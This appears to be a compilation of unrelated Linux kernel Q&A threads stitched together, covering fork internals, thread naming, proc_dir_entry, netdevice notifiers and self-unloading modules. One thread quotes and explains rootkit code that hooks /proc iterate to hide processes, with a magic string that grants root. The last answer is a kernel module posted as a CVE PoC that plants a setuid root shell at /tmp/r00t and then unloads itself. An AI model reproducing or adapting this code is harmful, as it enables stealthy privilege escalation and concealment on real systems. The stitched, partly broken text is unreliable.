Thank you for looking at and answering my previous question.
I'm reading the Linux kernel source, specifically linux/kernel/kthread.c.
That file contains a function, tsk_fork_get_node, shown below:
/* called from do_fork() to get node information for about to be created task */
int tsk_fork_get_node(struct task_struct *tsk)
{
#ifdef CONFIG_NUMA
	if (tsk == kthreadd_task)
		return tsk->pref_node_fork;
#endif
	return NUMA_NO_NODE;
}
I can't find the exact meaning of the pref_node_fork field, and I would like to know what the name stands for.
I also found the patch that introduced it (commit 207205a2ba, viewed with "git show 207205a2ba"),
but it contains no explanation of the pref_node_fork field in task_struct.
Summary:
I want to know the exact meaning of pref_node_fork.
I want to know what the name pref_node_fork stands for.
I don't see what the problem is. The commit message clearly states that it extends the API so that, when spawning a new kernel thread, you can specify which NUMA node should be used. You can then see that this is done by smuggling the node parameter through the pref_node_fork field and reading it back at fork time in tsk_fork_get_node. The name presumably stands for "preferred node for fork".
I have to ask: why are you looking at this code?
I am using pthreads in my program. I create a thread with pthread_create() and, right after creation, call pthread_setname_np() to set the new thread's name.
I observe that the name I set takes a short time to show up; initially the thread inherits the program name.
Any suggestions on how I can set the thread name at the time I create the thread with pthread_create()? I looked through the available pthread_attr_*() functions but did not find one that helps.
A quick way to reproduce what I am observing is as follows:
void *thread_loop_func(void *arg) {
    char thread_name[16];  // Linux thread names are at most 15 chars + NUL
    // some code goes here
    pthread_getname_np(pthread_self(), thread_name, sizeof(thread_name));
    // Output to console the thread_name here
    // some more code
    return NULL;
}
int main() {
    // some code
    pthread_t test_thread;
    pthread_create(&test_thread, &attr, thread_loop_func, &arg);
    pthread_setname_np(test_thread, "THREAD-FOO");
    // some more code, rest of pthread_join etc follows.
    return 0;
}
Output:
<program_name>
<program_name>
THREAD-FOO
THREAD-FOO
....
I am looking for the first console output to reflect THREAD-FOO.
how I can set the thread name at the time I create the thread using pthread_create()?
That is not possible. Instead, you can use a barrier or mutex to hold the child thread back until its name has been set. Or you can set the thread name from inside the thread itself (provided no other thread relies on its name before then).
Do not use pthread_setname_np. It is a nonstandard GNU extension; the _np suffix literally means "non-portable". Write portable code and keep your thread names in storage of your own instead.
Instead of pthread_setname_np(3) you can use prctl(2) with PR_SET_NAME. The only limitation of this call is that it can only set the name of the calling thread, so it has to be made from inside the new thread, at the very start of its start routine. Note that prctl(2) is Linux-specific, so it is no more portable than pthread_setname_np.
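A minimal sketch of the "name the thread from inside the thread" approach, assuming Linux and glibc. The struct named_thread_arg and the functions named_thread_main and run_named_thread are hypothetical names made up for this illustration; only prctl(2), PR_SET_NAME, PR_GET_NAME and the pthread calls are real APIs. Because the name is set in the first statement of the start routine, anything the thread does afterwards already sees the new name.

```c
#include <assert.h>
#include <errno.h>
#include <pthread.h>
#include <string.h>
#include <sys/prctl.h>

/* Hypothetical helper type: carries the wanted name in and the observed name out. */
struct named_thread_arg {
    const char *wanted;   /* name to set; Linux keeps at most 15 chars + NUL */
    char observed[16];    /* PR_GET_NAME needs a buffer of at least 16 bytes */
    int err;              /* 0 on success, otherwise an errno value */
};

static void *named_thread_main(void *p)
{
    struct named_thread_arg *a = p;

    /* First thing the thread does: name itself, before any real work. */
    if (prctl(PR_SET_NAME, (unsigned long)a->wanted, 0, 0, 0) != 0) {
        a->err = errno;
        return NULL;
    }
    /* Read the name back to show that it is already in effect. */
    if (prctl(PR_GET_NAME, (unsigned long)a->observed, 0, 0, 0) != 0)
        a->err = errno;
    return NULL;
}

/* Starts a self-naming thread, waits for it, and copies the name it saw
 * into out. Returns 0 on success or an error number on failure. */
int run_named_thread(const char *name, char *out, size_t len)
{
    struct named_thread_arg a = { .wanted = name };
    pthread_t t;
    int rc;

    assert(out != NULL && len > 0);
    rc = pthread_create(&t, NULL, named_thread_main, &a);
    if (rc != 0)
        return rc;
    rc = pthread_join(t, NULL);
    if (rc != 0)
        return rc;
    if (a.err != 0)
        return a.err;
    strncpy(out, a.observed, len);
    out[len - 1] = '\0';
    return 0;
}
```

Calling run_named_thread("THREAD-FOO", buf, sizeof buf) with a 16-byte buf should leave "THREAD-FOO" in buf. In a real program the body of named_thread_main after the first prctl() call would be the thread's actual work loop.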
I am new to Linux and I have been assigned the following:
In the Linux kernel sources, find _do_fork(), the fundamental routine for creating a new process.
What is the purpose (give a high-level description) of copy_process()?
Within copy_process(), what exact code guards against fork() bombs?
Can somebody help me out?
First, you need to know that fork() enters the kernel through a system call; the system call table dispatches it to the handler sys_fork(), which is defined like this:
SYSCALL_DEFINE0(fork)
{
	......
	return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}
So the core of fork is _do_fork().
This function does two major things:
it calls copy_process() to copy the kernel structure describing the process/thread, which is named task_struct;
it calls wake_up_new_task() to wake up the new task.
Like I said in my comment, elixir.bootlin.com is a very good resource for looking at the source code of Linux. It has a very good search engine. I've been looking at the source code and I think I found the code which does what you are looking for (related to fork bombs prevention).
In kernel/fork.c in the copy_process() function you find the following lines:
	if (atomic_read(&p->real_cred->user->processes) >=
			task_rlimit(p, RLIMIT_NPROC)) {
		if (p->real_cred->user != INIT_USER &&
		    !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN))
			goto bad_fork_free;
	}
This code does an atomic_read on a counter reached through the task_struct (p) that is being created. It reads the member real_cred, which is a struct of type cred defined in include/linux/cred.h. This struct contains a member named user, which is a struct of type user_struct defined in include/linux/sched.h. This user_struct contains a member named processes, which is an atomic_t, itself a struct containing one member (an int). So processes is basically an int that tells the kernel how many processes a user has. The code above checks this member against the value returned by the task_rlimit() function, i.e. the RLIMIT_NPROC resource limit. If the limit is reached, it cancels the whole thing by jumping to bad_fork_free. Honestly, I don't completely understand the inner if, but it appears to exempt the root user (INIT_USER) and tasks holding CAP_SYS_RESOURCE or CAP_SYS_ADMIN from the limit. You can always look for details in the source code.
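The limit that the kernel check compares against can be inspected from user space. The following is a small sketch, assuming Linux and glibc, that reads RLIMIT_NPROC with getrlimit(2); the function names read_nproc_limit and print_nproc_limit are hypothetical and exist only for this illustration. It does not show the kernel's per-user process counter, only the limit side of the comparison.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/resource.h>

/* Hypothetical helper: fetch the per-user process limit of the caller.
 * Returns 0 on success, -1 on error (errno is set by getrlimit). */
int read_nproc_limit(struct rlimit *out)
{
    assert(out != NULL);
    return getrlimit(RLIMIT_NPROC, out);
}

/* Hypothetical helper: print the soft and hard limits in readable form. */
void print_nproc_limit(void)
{
    struct rlimit rl;

    if (read_nproc_limit(&rl) != 0) {
        perror("getrlimit(RLIMIT_NPROC)");
        return;
    }
    /* The soft limit is the value that fork() is checked against. */
    if (rl.rlim_cur == RLIM_INFINITY)
        printf("soft limit: unlimited\n");
    else
        printf("soft limit: %llu\n", (unsigned long long)rl.rlim_cur);

    if (rl.rlim_max == RLIM_INFINITY)
        printf("hard limit: unlimited\n");
    else
        printf("hard limit: %llu\n", (unsigned long long)rl.rlim_max);
}
```

Calling print_nproc_limit() from main() prints the same values that "ulimit -u" reports in a shell. Lowering the soft limit with setrlimit(2) before forking is the usual way to see fork() fail with EAGAIN once the limit is reached.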
I'm migrating a kernel module from 3.1 to 3.18. The definition of struct proc_dir_entry was moved to fs/proc/internal.h. How do I use this structure in the new version? When I tried to include internal.h, I got an error saying it doesn't exist:
fatal error: fs/proc/internal.h: No such file or directory
Is there something I'm missing to work with proc_dir_entry? I read that this structure was made opaque in 3.10. What is the proper way to work with it?
In my code for example I have:
static struct proc_dir_entry *proc01;
...
parent = proc01->parent;
What is the proper way to work with proc_dir_entry?
What I'm trying to do is EXACTLY this: dereferencing proc_dir_entry pointer causing compilation error on linux version 3.11 and above
I made the exact same modifications as the code listed on my own. The only changes are that I'm using newer/different kernel headers now.
Here is how ivyl rootkit works.
The kernel module initializes with __init rootkit_init(void).
Run both procfs_init or fs_init
Both of these functions replace the readdir (for kernels 3.10 and older) or iterate (for kernels 3.11 and newer) with a custom version. This is the hiding functionality of a rootkit. They work by making memory read/write replacing the function then making the memory read only.
procfs_init operates on the process filesystem. It creates a file that is read/write by everyone called rtkit. It replaces the original readdir (iterate) with the new one that hides rtkit from view.
fs_init operates on the filesystem in /etc. This is where the module is stored. In other words, it hides the executable code.
The code in procfs_init is what relies on proc_dir_entry structure. This code does the following in detail (line by line):
Creates an entry for the process "rtkit" that is read/write by everyone.
Error checking – if the process is not created return 0.
Get the parent process.
Error checking – if parent is null or the parent process is not "/proc" return 0.
Set the read function of the rtkit process – this just prints some information about what the rootkit is doing. A kind of help command.
Set the write function of the rtkit process. This is main function that brings everything together. It looks for the code "mypenislong" and changes to root. The user running this rootkit now has full root privileges. It also hides given processes and given modules as per the command given.
Get a file operations structure (file_operations) for the root process (proc_root)
From the file operations get the original readdir (iterate) function.
Set the proc_fops to read/write
Set the proc_fops iterate member to the new function of the rootkit (the one that hides functionality)
Set the proc_fops back to read only.
Return 1.
The code for procfs_init:
static int __init procfs_init(void)
{
//new entry in proc root with 666 rights
proc_rtkit = create_proc_entry("rtkit", 0666, NULL);
if (proc_rtkit == NULL) return 0;
proc_root = proc_rtkit->parent;
if (proc_root == NULL || strcmp(proc_root->name, "/proc") != 0) {
return 0;
}
proc_rtkit->read_proc = rtkit_read;
proc_rtkit->write_proc = rtkit_write;
//substitute proc readdir to our wersion (using page mode change)
proc_fops = ((struct file_operations *) proc_root->proc_fops);
proc_readdir_orig = proc_fops->iterate;
set_addr_rw(proc_fops);
proc_fops->iterate = proc_readdir_new;
set_addr_ro(proc_fops);
return 1;
}
Since the proc_dir_entry structure is now opaque, how do I replace the functionality of this code? I need the code to read/write processes so that the process can be hidden as required.
Edit: modified question title and removed extraneous statement. Added clarification on what I'm trying to do.
Edit: Added description of ivyl rootkit workings.
I am working on a kernel-mode netfilter module on Ubuntu and need information about all network interfaces and their properties in the module code.
Inside init_module() I use register_netdevice_notifier() for that purpose. When the callback is called I see correct event codes such as up/down, but the third parameter, a void * that I cast to net_device *, appears to yield an object with invalid properties: ->name is an empty string, ->ifindex is a nonsense number, and so on.
I tried a debug build of the module on kernel 3.19 and rebuilt it on 4.2. The result is the same: I cannot read the properties of the net_device that the event relates to.
What could the problem be?
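From what I can see on LXR, you need to call netdev_notifier_info_to_dev() on the last parameter to get your net_device *. On these kernel versions the notifier is passed a pointer to a struct netdev_notifier_info rather than the net_device itself, so casting the pointer directly gives garbage.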
I've made a simple module which prints GDT and IDT on loading. After it's done its work, it's no longer needed and can be unloaded. But if it returns a negative number in order to stop loading, insmod will complain, and an error message will be logged in kernel log.
How can a kernel module gracefully unload itself?
As far as I can tell, it is not possible with a stock kernel (you can modify the module loader core as I describe below but that's probably not a good thing to rely on).
Okay, so I've taken a look at the module loading and unloading code (kernel/module.c) as well as several users of the very-suspiciously named module_put_and_exit. It seems as though there is no kernel module which does what you'd like to do. All of them start up kthreads inside the module's context and then kill the kthread upon completion of something (they don't automatically unload the module).
Unfortunately, the function which does the bulk of the module unloading (free_module) is statically defined within kernel/module.c. As far as I can see, there's no exported function which will call free_module from within a module. I feel like there's probably some reason for this (it's very possible that attempting to unload a module from within itself will cause a page fault because the page which contains the module's code needs to be freed). Although this probably could be solved by making a noreturn function which just schedules after preventing the current (invalid) task from being run again (or just running do_exit).
A further point to ask is: are you sure that you want to do this? Why don't you just make a shell script to load and unload the module and call it a day? Auto-unloading modules are probably a bit too close to Skynet for my liking.
EDIT: I've played around with this a bit and have figured out a way to do this if you're okay with modifying the module loader core. Add this function to kernel/module.c, and make the necessary modifications to include/linux/module.h:
/* Removes a module in situ, from within the module itself. */
void __purge_module(struct module *mod) {
	free_module(mod);
	do_exit(0);
	/* We should never be here. */
	BUG();
}
EXPORT_SYMBOL(__purge_module);
Calling this with __purge_module(THIS_MODULE) will unload your module and won't cause a page fault (because you don't return to the module's code). However, I would still not recommend doing this. I've done some simple volume testing (I inserted a module using this function ~10000 times to see if there were any resource leaks -- as far as I can see there aren't any).
Oh, you can definitely do it :)
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358#gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
}
void cleanup_module(void) {
return 0;
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}